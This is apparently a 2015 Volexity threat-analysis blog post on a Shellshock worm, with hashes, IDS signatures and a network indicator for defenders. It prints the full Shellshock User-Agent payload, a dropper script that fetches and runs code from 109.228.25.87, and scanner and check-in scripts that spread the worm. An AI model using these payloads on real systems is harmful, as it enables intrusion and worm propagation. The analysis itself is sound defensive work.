A New Shellshock Worm on the Loose

April 9, 2015

by Volexity

In a blog post from September last year, we described some of the early Shellshock activity we were seeing in the wild. Since then we have continued to observe periodic scanning, which have by in large not been particularly noteworthy. That remained the case until just a little bit ago. Starting late in the afternoon on April 8, 2015, the frequency and breadth of scanning observed by Volexity increased fairly dramatically. A closer look at the activity reveals that a worm (of sorts) has been set loose on the Internet looking for vulnerable hosts to exploit over HTTP.

The inbound requests that have been observed look like this:

GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
Host: <ip address>
Connection: Close

The first request contains a double HTTP/1.1 header. The Shellshock exploit attempt then comes via the User-Agent string. The attacking systems attempt the exploit against the following file paths on the targeted system (in this order):

/cgi-bin/php
/
/cgi-bin/bash
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/fire.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/php5-cli
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin-sdb/printenv
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/test.sh
/cgi-bin/tools/tools.pl
/cgi-mod/index.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/php5

If successful, the exploit attempts to perform the following actions:

• Print "XSUCCESS!" back to the source system.
• Change to a temporary directory on the system (/tmp or /var/tmp)
• Remove any existing files named .c.txt and .d.txt
• Download the file .c.txt from 109.228.25.87 using wget, curl, fetch, and lwp-download
• Change the access permissions to the file .c.txt or any file starting with .c.txt in the directory in order to make it executable
• Execute the file .c.txt or any file in the directory starting with .c.txt

Now, a further look at the file .c.txt shows it has the following contents:

rm -rf /tmp/* /tmp/.* &
rm -rf /var/tmp/* /var/tmp/.* &
cd /var/tmp/
cd /tmp
killall -9 scan brute f b r print pscan pnscan ps minerd &
sleep 10
wget http://109.228.25.87/.ips-80/cc.tar
curl -O http://109.228.25.87/.ips-80/cc.tar
sleep 5
tar xvf cc.tar
tar zxvf cc.tar
tar xvf  cc.tar.1
tar zxvf cc.tar.1
tar xzvf cc.tar
tar xzvf cc.tar.1
sleep 10
cd .cc
chmod +x *
nohup ./r &

After performing a few tasks, the script will download a tarball file from http://109.228.25.87/.ips-80/cc.tar.

Filename: cc.tar
File size: 51200 bytes
MD5 hash: 4d56cf72a5e9a64cffce2489f0c83a47
SHA1 hash: 826c881d0787f11f4acb7d3b27905c47d8e8d5b3
Notes: Tarball containing scripts and 32-bit and 64-bit scanning binaries.

Within this tarball file are the following files:

Filename: cgiscan32
File size: 12685 bytes
MD5 hash: b3f9345a6e2de5348645e8060ad1c8a9
SHA1 hash: d669bca815f44d54d81ba523ccfd187529394ee7
Notes: 32-bit ELF scanning binary (compiled sslvuln.c)

Filename: cgiscan64
File size: 15083 bytes
MD5 hash: 20fa3835528a5f28907dea9123117b02
SHA1 hash: a8ec2eb582c7011aee5c90ec0dcf5b48e7d14b5e
Notes: 64-bit ELF scanning binary (compiled sslvuln.c)

Filename: patch
File size: 556 bytes
MD5 hash: 23ea9aed18bdef6ef5efee3b5fbdde0c
SHA1 hash: 8062ef8840b5664e0c58e83224a68ba283b38aac
Notes: Text file with file paths to be scanned for Shellshock vulnerability.

Filename: paths
File size: 556 bytes
MD5 hash: 23ea9aed18bdef6ef5efee3b5fbdde0c
SHA1 hash: 8062ef8840b5664e0c58e83224a68ba283b38aac
Notes: Text file with file paths to be scanned for Shellshock vulnerability. Same file as "patch".

Filename: print
File size: 490 bytes
MD5 hash: eba7062843a4161907758112f78642c6
SHA1 hash: dd411e6307f8142a8b67173748e4a46c8a2af654
Notes: Script used for reporting back IP addresses found to be vulnerable with Shellshock.

Filename: r
File size: 5463 bytes
MD5 hash: a15666421a3d34064bbb18a3449f1406
SHA1 hash: 586de34a05c09f235c61da9f0d54ec53d7c277ac
Notes: Script used to feed the "start" script file paths to be downloaded that contain blocks of IP addresses to be scanned.

Filename: start
File size: 437 bytes
MD5 hash: 62d07f41433c67e1120cd9e9a00135c5
SHA1 hash: f10e0a29e5f9e6cf21fbce04fe96eacb780e8b29
Notes: Script that initiates all IP range downloads, scanning, saving of vulnerable hosts, and then launches "print" to report back.

Attack Initiation

As can be seen from the file .c.txt, the last thing it does is launch the file r. The file r is a bash script which feeds another bash script, start, three letters as a parameter. The full contents of the file start are shown below:

#!/bin/bash
############### Config ###############
rm -rf scan.log
rm -rf vuln-ip.txt

wget http://109.228.25.87/.ips-80/$1
curl -O http://109.228.25.87/.ips-80//$1
fetch http://109.228.25.87/.ips-80/$1

cat $1* |sort -u >> scan.log
rm -rf $1*
sleep 1

if [ `getconf LONG_BIT` = "64" ]
then
./cgiscan64 scan.log v 50 patch
else
./cgiscan32 scan.log v 50 patch
fi

sleep 60
rm -rf t.log
cat vuln-ip.txt | sort -u >t.log
sleep 4
./print

As you can see, the first thing the script does is try to remove any existing copies of scan.log and vuln-ip.txt. After that, it then tries to download the file that was fed to it from the r script. It then appends the contents of the download to the file scan.log and removes the initial file. An example download of one such file would be from the URL http://109.228.25.87/.ips-80/xxx. That "xxx" is not a placeholder, that is an actual file on the server. The file "xxx" contains 26,356 IP addresses and starts with the IP 98.1.153.231 and ends with 98.120.200.16. Each of the various file chunks contain tens of thousands of IP addresses to be used for scanning.

The script then launches either the 32-bit or 64-bit version of an ELF scanning binary. Based on the contents of the file, it appears to be a modified version of a file called mass.c referenced as sslvuln.c that was found on a Romanian website. Notable strings in the binaries include:

GET %s%s HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
Host: %s
Connection: Close

Nu Pot Deschide %s

vuln-tot.txt

vuln-ip.txt

As you can see, the binaries have the Shellshock download site we have observed embedded into the linux binaries. As a result, all systems that are successfully exploited then repeat the process that was just observed and effectively become part of the scanning/worm network. The cgiscan binaries log all vulnerable hosts they find to a file named vuln-ip.txt. Finally, at the end of the start script, once the current scanning activity has completed, it sorts, removes any duplicate entries, and stores all discovered vulnerable hosts into a file named t.log and launches another bash script named print. The full contents of the print bash script are shown below:

#!/bin/bash

if which wget >/dev/null; then

for i in `cat t.log|sort|uniq`
do
wget -O .tmp http://109.228.25.87/.c.php?request="$i" &>/dev/null&
done
else

if which curl >/dev/null; then

for i in `cat t.log|sort|uniq`
do
curl -O http://109.228.25.87/.c.php?request="$i" &>/dev/null&
rm -rf $i
done
else

if which fetch >/dev/null; then

for i in `cat t.log|sort|uniq`
do
curl -O http://109.228.25.87/.c.php?request="$i" &>/dev/null&
rm -rf $i
done

fi

fi

fi

sleep 1

The script enumerates through the list of vulnerable hosts recorded in the file t.log and reports them back to the attacker's server at 109.228.25.87 via the file .c.php by placing the IP address as a value to the request= URI parameter. This allows the attackers to maintain a list of systems that are vulnerable that they have managed to compromise.

Network Indicators

The most solid network indicator at this time is looking for any sort of outbound communication with the IP address 109.228.25.87. Utilizing the Shadowserver ASN lookup service, we see this system resides on an IP address at Fast Hosts Ltd.

$ whois -h asn.shadowserver.org 'origin 109.228.25.87'
8560 | 109.228.0.0/18 | ONEANDONE | DE | fasthosts.com | Fast Hosts Ltd

Additionally, signatures can be leveraged with an IDS to look for the requests as well. Simple signatures that can be leveraged is shown below:

Suricata Format

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Volex - Possible Shellshock Worm Check-in Detected"; flow:established,to_server; content:".c.php?request="; http_uri;  sid:2015040901;)

Snort Format

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Volex - Possible Shellshock Worm Check-in Detected"; flow:established,to_server; content:".c.php?request="; http_uri;  sid:2015040901;)

These signatures can be made more broad to just look for ".php?request=" and alternatively can be made more restrictive by adding a pcre check for an IP address as part of the URI (/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/).

A Long Story Short

To make a long story short, you should know there is a Shellshock worm, of sorts, going around again. Compromised systems are being added to the network of systems that are scanning for more vulnerable systems. This process is continuing to repeat. The "worm" requires that 109.228.25.87 be online for the files to be downloaded. However, even if this system goes offline, the attackers have still likely compiled a list of vulnerable systems through download logs and the check-in URL where scanning systems further report other vulnerable hosts they have discovered. It is recommended that you actively monitor for connections to 109.228.25.87. If you see traffic going there, you will likely need to deal with a multitude of malware on a system that has likely been compromised several times as a result of the Shellshock vulnerability.

Update 2015-04-09 12:14 UTC 

The malicious files housed at 109.228.25.87 appear to have been taken down and scanning activity appears to have slowed down fairly dramatically.